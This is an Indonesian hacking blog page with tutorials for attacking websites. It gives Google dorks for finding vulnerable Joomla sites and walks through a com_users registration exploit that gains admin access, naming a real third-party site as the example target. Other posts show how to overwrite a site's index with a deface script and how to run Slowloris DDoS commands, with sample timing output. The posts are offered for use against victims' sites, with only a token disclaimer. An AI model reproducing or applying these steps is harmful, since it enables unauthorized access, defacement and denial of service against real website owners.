2

Ebook Hacking full bahasa indonesia

Selasa, 29 Desember 2015
ketemu lagi bersama ane para jon's :D

kali ini saya akan membagikan buku hacking buat kalian :D

dengan bahasa indonesia + gambar :D

langsung saja ga usah banyak bicara cape :D

xcode magazine full : SEDOT

dan ada lagi yaitu

Buku Sakti Hacker : SEDOT

0

SOS CYBER FOTO

Sabtu, 26 Desember 2015





0

Script Deface SOS CYBER

Dilarang merubah apapun didalam script

kecuali " Hacked By : (nomor sos kalian )"

karena nanti script akan rusak jika d ganti ganti

langsung ajah sedot jons sedot :v

SEDOT
0

Tebas index Joomla

Oke langsung saja kita mulai.


jika sudah masuk sebagai admin




Terus Klik "Template Manager" Ntar Nongol ini deh

Nahh Ingettin nama template yang ada bintangnya itu, tapi disini kita akan tebas index sitenya, bukan index administratornya, jadi ingetin aja yg Template Locationnya "Site", yaitu "JBlank", Terus Klik Templates (yg ada tanda panahnya). Nanti muncul deh :

Trus ente cari Template site yang tadi, Disini tadi JBlank, Tuh ketemu 
Lalu klik Jblank Details
 
Trus Klik "Edit main page templates" dan Tunngu sejenak, nanti akan muncul script Templatenya. :)

Nahhhh..!!! Langsung ganti scriptnya sama script deface enteee ^_^ ..!!
 
Script SOS CYBER TEAM : SEDOT
 
Langsung Klik "Save & Close" Jika muncul seperti dibawah ini berarti suksesssssssssss.
 
Coba sekarang buka homepage sitenya :v xixixixixixi
 
EBRETTTTTTT JEBREETTTTT JEBREEEETTT :V :O :ngakak , Sukkseessssssss..!!
Udah kan??
Nyengir dong :ngakak :v

 

 
0

Deface Web Joomla

ehm,, jumpa lagi nih dengan coretan2 semerawut ane tapi ngangenin untuk dibaca,, wkkwkwk yo dah, dah pasti pada ga sabar kan udah nunggu dari kemaren?? wkwkwk langsung daaahh :p
 
UPDATE:
Ciri2 web yg vuln com_user, silahkan sobat check dulu login adminnya, jika seperti gambar dibawah, berarti web tersebut memungkinkan untuk bisa di exploitasi, selain itu tidak bisa...
Contoh :
http://www.uog.edu.pk/administrator/

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com 


#Dork Lain:
inurl:index.php/­using-joomla/­extensions/plugins
inurl:index.php/­using/joomla
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-category-list­/50-upgraders
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-categories/­28-park-site/­photo-gallery
inurl:index.php/­using-joomla/­parameters/­26-sample-data-articl­es/park-
Inurl:index.php/­plugins
Inurl:index.php/­rss=feed
inurl:index.php/­joomla/content/­category-blog/­24-joomla
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-categories/­84-gd-articles
inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management
inurl:index.php/­using-joomla/­extension/components/­content-component/­article-category-list­/50-upgraders intext:joomla! 1.7 - open source content management
inurl:index.php/­19-sample-data-articl­es/joomla/­50-upgraders site:id inurl:index.php/­using-joomla/­extensions/templates/­beez-2/­home-page-beez-2
inurl:index.php/­19-sample-data-articl­es/joomla
inurl:Home Page Beez5 joomla 1.6 index.php/­using-joomla/­extensions/­components/­users-component/­registration-form


2. Pilih target sobat, lalu masukin exploit berikut:

index.php?option=com_users&view=registration

3. Ane disini mengambil contoh:

http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss

4. kemudian ane ganti menjadi:

http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration 







5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U

kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:





Exploit Register joomla : SEDOT

 6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat! liat gambar !

Note: username, email, boleh diganti sesuka hati.

7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!



8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!





 9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!



" kemudian anda suruh mendaftar admin dulu ( manipulasi )"
contohnya saya akan memasukan nama admin palsunya yaitu:

Username:genesis
Password:onix

10. Lalu masuk kehalaman admin login nya! 
http://mobile.resto-lincontournable.com/administrator
.
 11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username:genesis
Password:onix

Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin! trus tebas deh index nya :p

KALO GA BERHASIL LOGIN SEBAGAI ADMIN, SILAHKAN CARI TARGET LAINNYA!!

Goodluck!!! :p

untuk TEBAS INDEX bisa lihat disini : GO

udah gitu aja! Salam........ :p

sumber : indocyberarmy

ane males screen shot :p

0

Pengertian Google Dork

Jumat, 25 Desember 2015






Dalam dunia maya, Istilah Google Dork tidak asing lagi bagi kita,
mungkin sering kita dengar, tapi tidak tau apa maksudnya.

Google Dork adalah kata kunci dalam mempermudah pencarian data,
bahkan kita juga dapat melihat password yang tersembunyi dalam suatu data.(itu jika kamu pintar mengkreasikan dork :p )
Google dork juga bisa dikategorikan sebagai senjata berbahaya para hacker.

Bagian-bagian google dork :

1. -intitle
    -allintitle
Berfungsi untuk mencari judul pada suatu web

2 .-intext
    -allintext
Berfungsi untuk mencari suatu text dalam terkandung dalam web

3. site
Berfungsi untuk mencari site/domain tertentu suatu web (com,sch.id,au dll)

4. -inurl 
    -allinurl
Berfungsi mencari string yang terdapat pada url

5. -filetype
Berfungsi mencari jenis file yang spesifik

Contoh menggunakan Google Dork
intitle:siswa site:sch.id 
Maksud dari intite:siswa berarti, kita sedang mencari data yang berjudul "siswa''
dan site:sch.id adalah site sekolah yang berakhiran sch.id

Dalam mengunakan Google dork sebenarnya sangat mudah, kita hanya perlu mengkreasikannya
agar apa yang kita cari di search engine google dapat kita temukan dengat cepat.

Oke, sekian dulu yah semoga bisa bermanfaat :)
0

cara ddos dengan script perl

Minggu, 20 Desember 2015



Kalau belum tau cara mengathui ip terget kalian bisa gunakan cmd dengan perintah:
Keterangan, www.target.com ( web target kalian)

Lanjut ke perl slowris

Pertama harus anda install perl activationnya(wajib) : untuk windows 7 32bit
Kalau belum punya silahkan SEDOT
Setelah instal
Donwload script ddos (full scan port) nya : SEDOT
Kalau sudah donwload , taruh script itu di D:
lalu jalankan slowloris
buka cmd kalian lalu ketik D:
sos attack.pl -dns www.target.com -port 80 –test

"kesimpulan perintah diatas adalah anda akan test berapa timeout bandwith dari web tersebut dan port default 80"

nah maka si slowloris akan scan sampai dapat timeoutnya, scannya lumayan lama sih, kalau udah selesai begini nih hasilnya

Defaulting to a 5 second tcp connection timeout.

Multithreading enabled.

Testing www.target.com could take up to 14.35 minutes.

Connection successful, now just wait...

Trying a 1 second delay:

        Worked.

Trying a 30 second delay:

        Worked.

Trying a 90 second delay:

        Worked.

Trying a 240 second delay:

        Worked.

Trying a 500 second delay:

        Failed after 500 seconds.

Remote server closed socket.

Use 240 seconds for -timeout.
-------------------------------------------------------------------------------------------
dari analisis Slowloris timeoutnya 240 dan tcp connection 5, setelah itu kita melakukan penyerangan buka cmd lalu ketik  perintah :
sos attack.pl -dns www.target.com -port 80 -timeout 240 -num 10000 -tcp 5
------------------------------------------------------------------------------------------------------
dari perintah di atas maka slowloris akan menyerang target.com dengan attack 10000 per 240 , dan hasilnya pasti web akan mudah down karena kita menyerang pada timout/kelemahan 240 tadi.

nah gunakan tutorial di atas dengan bijak, saya tidak bertanggung jawab atas kerusakan apapun karena tutorial di atas hanya pembelajaran semata

tambahan :

atau kalian mau scan portnya manual silahkan SEDOT

lalu simpan di D:

kalau sudah donwload scritpnya, kalian edit script tersebut dengan notepad
lalu cari : $ip = "ip-target" if not $ip;

"pada bagian "ip-target" , kalian ubah sesuai ip web korban kalian"
buka cmd
kalian gunakan dengan perintah :
 
D: 
 
lalu ketik

portscanner.pl